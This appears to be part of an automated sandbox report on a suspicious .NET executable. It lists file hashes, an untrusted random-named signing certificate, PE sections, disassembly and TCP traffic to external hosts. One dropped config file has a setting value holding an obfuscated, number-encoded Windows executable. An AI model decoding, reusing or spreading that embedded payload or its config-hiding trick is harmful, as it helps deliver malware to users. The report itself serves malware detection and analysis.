                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >.. <section name="BbgzvTZwbLOGmSg.HuqumYvFBayIysJLnyZNWODzrJrJpiyaKgF" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />.. </sectionGroup>.. </configSections>.. <userSettings>.. <BbgzvTZwbLOGmSg.HuqumYvFBayIysJLnyZNWODzrJrJpiyaKgF>.. <setting name="LaGMvNoFtuYLSNSlRH" serializeAs="String">.. <value>77g90g144g0g3g0g0g0g4g0g0g0g255g255g0g0g184g0g0g0g0g0g0g0g64g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g128g0g0g0g14g31g186g14g0g180g9g205g33g184g1g76g205g33g84g104g105g115g32g112g114g111g103g114g97g109g32g99g97g110g110g111g116g3
                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hfLfKDTosA.exe.log
                                                                                                                                                                                        Process:C:\Users\user\Desktop\hfLfKDTosA.exe
                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                        Category:modified
                                                                                                                                                                                        Size (bytes):1216
                                                                                                                                                                                        Entropy (8bit):5.355304211458859
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                                                                                                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                                                                                                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                                                                                                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                                                                                                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                                                                                                                        Static File Info

                                                                                                                                                                                        General

                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                        Entropy (8bit):6.044090080380251
                                                                                                                                                                                        TrID:
                                                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                        File name:hfLfKDTosA.exe
                                                                                                                                                                                        File size:17616
                                                                                                                                                                                        MD5:cf351c60783008409a564b31a5c38dd6
                                                                                                                                                                                        SHA1:96f9fbed2b2c5ba5bc542223d6d8ca05fcb377ad
                                                                                                                                                                                        SHA256:32bdc406f8f2c4f9133a41e9c6e1c56aaad679c36a797ac857334779822a723e
                                                                                                                                                                                        SHA512:ed99ddc3f3b3eeb5dabe7ae49e1e1b24c89d8a8d297fc39c0c02dc116d364d3ce91edcbc2ec3232ca0fa65e48a1db662784198a6b6cedfaf98acc6a95fea7a6f
                                                                                                                                                                                        SSDEEP:384:z+u/renYPlzY8xULh+cSUee3C0EP6qVY12HAh7z1X:zVCn8Z+LEU7y0EP6qVY12gh7z1X
                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...yX............"...0..&..........^D... ...`....@.. ....................................@................................

                                                                                                                                                                                        File Icon

                                                                                                                                                                                        Icon Hash:00828e8e8686b000

                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                        General

                                                                                                                                                                                        Entrypoint:0x40445e
                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                                        Time Stamp:0xFABC5879 [Sun Apr 22 01:10:17 2103 UTC]
                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                        CLR (.Net) Version:v4.0.30319
                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                        Authenticode Signature

                                                                                                                                                                                        Signature Valid:false
                                                                                                                                                                                        Signature Issuer:C=KdqnEXvJEvWcDM, S=aQHrKGRgDAhxXL, L=cNnIrJyzcqiPsAvjDsEdBebDEbvUBHGDtwxsGQsBty, T=eChRNCJEvAgTyKkSYdgPgdhnpgVfkY, E=KTKczRgwypTZHzRiOsiXTgxkVGtvmFrQSRtObBdcOWzhisL, OU=eHLDCTiluPbhZkVLWkWAC, O=GrbDyUsVcgeBmdFDrXCBNsu, CN=CGsLCQHMZbqNJHpGEvGIzbOtFofZGHmgXfvxtaR
                                                                                                                                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                        Error Number:-2146762487
                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                        • 3/1/2021 10:34:38 PM 3/1/2022 10:34:38 PM
                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                        • C=KdqnEXvJEvWcDM, S=aQHrKGRgDAhxXL, L=cNnIrJyzcqiPsAvjDsEdBebDEbvUBHGDtwxsGQsBty, T=eChRNCJEvAgTyKkSYdgPgdhnpgVfkY, E=KTKczRgwypTZHzRiOsiXTgxkVGtvmFrQSRtObBdcOWzhisL, OU=eHLDCTiluPbhZkVLWkWAC, O=GrbDyUsVcgeBmdFDrXCBNsu, CN=CGsLCQHMZbqNJHpGEvGIzbOtFofZGHmgXfvxtaR
                                                                                                                                                                                        Version:3
                                                                                                                                                                                        Thumbprint MD5:E10476804635D5199F5472276046F305
                                                                                                                                                                                        Thumbprint SHA-1:DEAC1BBF35C992C1B95049E0D60034710DDE008A
                                                                                                                                                                                        Thumbprint SHA-256:765E7B311A0CAD32BD94CFA4648B89D3C954AE59A698A3AC4EB74D0A149D702B
                                                                                                                                                                                        Serial:00AAE37FE6776D6CF933BC64B4955F7523

                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                        Instruction
                                                                                                                                                                                        jmp dword ptr [00402000h]
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al

                                                                                                                                                                                        Data Directories

                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x440c0x4f.text
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x448.rsrc
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x30000x14d0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000xc.reloc
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                        Sections

                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                        .text0x20000x24640x2600False0.542454769737data5.47042980648IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                        .rsrc0x60000x4480x600False0.317708333333data3.91990224854IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                        .reloc0x80000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                        Resources

                                                                                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                                                                                        RT_VERSION0x60580x3f0SysEx File - OctavePlateauEnglishUnited States

                                                                                                                                                                                        Imports

                                                                                                                                                                                        DLLImport
                                                                                                                                                                                        mscoree.dll_CorExeMain

                                                                                                                                                                                        Version Infos

                                                                                                                                                                                        DescriptionData
                                                                                                                                                                                        LegalCopyright2017 get_InitialCatalog
                                                                                                                                                                                        Assembly Version4.7.0.0
                                                                                                                                                                                        InternalNameget_EditedFormattedValue.exe
                                                                                                                                                                                        FileVersion2.7.0.3
                                                                                                                                                                                        CompanyNameIAssemblyRefFinder
                                                                                                                                                                                        LegalTrademarkstagDBBINDING
                                                                                                                                                                                        CommentsDisplayedBandsData
                                                                                                                                                                                        ProductNameget_EditedFormattedValue
                                                                                                                                                                                        ProductVersion4.7.0.0
                                                                                                                                                                                        FileDescriptionGZipConstants
                                                                                                                                                                                        OriginalFilenameget_EditedFormattedValue.exe
                                                                                                                                                                                        Translation0x0409 0x0514

                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        Mar 2, 2021 20:41:00.947134972 CET4971980192.168.2.6151.101.2.133
                                                                                                                                                                                        Mar 2, 2021 20:41:00.987766027 CET8049719151.101.2.133192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:00.987973928 CET4971980192.168.2.6151.101.2.133
                                                                                                                                                                                        Mar 2, 2021 20:41:00.988303900 CET4971980192.168.2.6151.101.2.133
                                                                                                                                                                                        Mar 2, 2021 20:41:01.028793097 CET8049719151.101.2.133192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:01.029314995 CET8049719151.101.2.133192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:01.029337883 CET8049719151.101.2.133192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:01.029484034 CET4971980192.168.2.6151.101.2.133
                                                                                                                                                                                        Mar 2, 2021 20:41:01.030324936 CET4971980192.168.2.6151.101.2.133
                                                                                                                                                                                        Mar 2, 2021 20:41:01.070842981 CET8049719151.101.2.133192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:01.159478903 CET49720443192.168.2.6151.101.2.133
                                                                                                                                                                                        Mar 2, 2021 20:41:01.200860023 CET44349720151.101.2.133192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:01.201286077 CET49720443192.168.2.6151.101.2.133
                                                                                                                                                                                        Mar 2, 2021 20:41:01.215800047 CET49720443192.168.2.6151.101.2.133
                                                                                                                                                                                        Mar 2, 2021 20:41:01.256491899 CET44349720151.101.2.133192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:01.256593943 CET44349720151.101.2.133192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:01.256608963 CET44349720151.101.2.133192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:01.256675959 CET49720443192.168.2.6151.101.2.133
                                                                                                                                                                                        Mar 2, 2021 20:41:01.275002956 CET49720443192.168.2.6151.101.2.133
                                                                                                                                                                                        Mar 2, 2021 20:41:01.316454887 CET44349720151.101.2.133192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.523768902 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.561918974 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.562277079 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.562596083 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.600590944 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.779750109 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.779779911 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.779802084 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.779818058 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.779835939 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.779849052 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.779864073 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.779882908 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.779988050 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.780006886 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.780164003 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.780199051 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.780662060 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.780685902 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.781562090 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.781586885 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.781708002 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.781722069 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.782469988 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.782493114 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.782645941 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.783368111 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.783385038 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.783524036 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.784265041 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.784292936 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.784404993 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.785166979 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.785190105 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.785851002 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.786048889 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.786072969 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.786195040 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.787034035 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.787058115 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.787240028 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.787827969 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.787849903 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.787947893 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.788739920 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.788762093 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.789459944 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.818111897 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.818324089 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.818586111 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.818605900 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.818674088 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.818692923 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.819489002 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.819511890 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.820425034 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.820446014 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.820523977 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.820530891 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.821706057 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.821728945 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.821748972 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.821793079 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.822640896 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.822664022 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.823503017 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.823527098 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.823577881 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.823584080 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.824414015 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.824436903 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.826289892 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.859772921 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.859802008 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.859914064 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.860136032 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.860156059 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.860594034 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.861063004 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.861084938 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.861356020 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.861939907 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.861963034 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.862054110 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.862838030 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.862868071 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.862962008 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.863744974 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.863770008 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.864677906 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.864701033 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.864762068 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.864768982 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.865556955 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.866298914 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.866339922 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.866452932 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.866471052 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.866761923 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.867311954 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.867340088 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.868195057 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.868216991 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:05.868274927 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.868280888 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:05.869075060 CET8049729104.21.59.148192.168.2.6
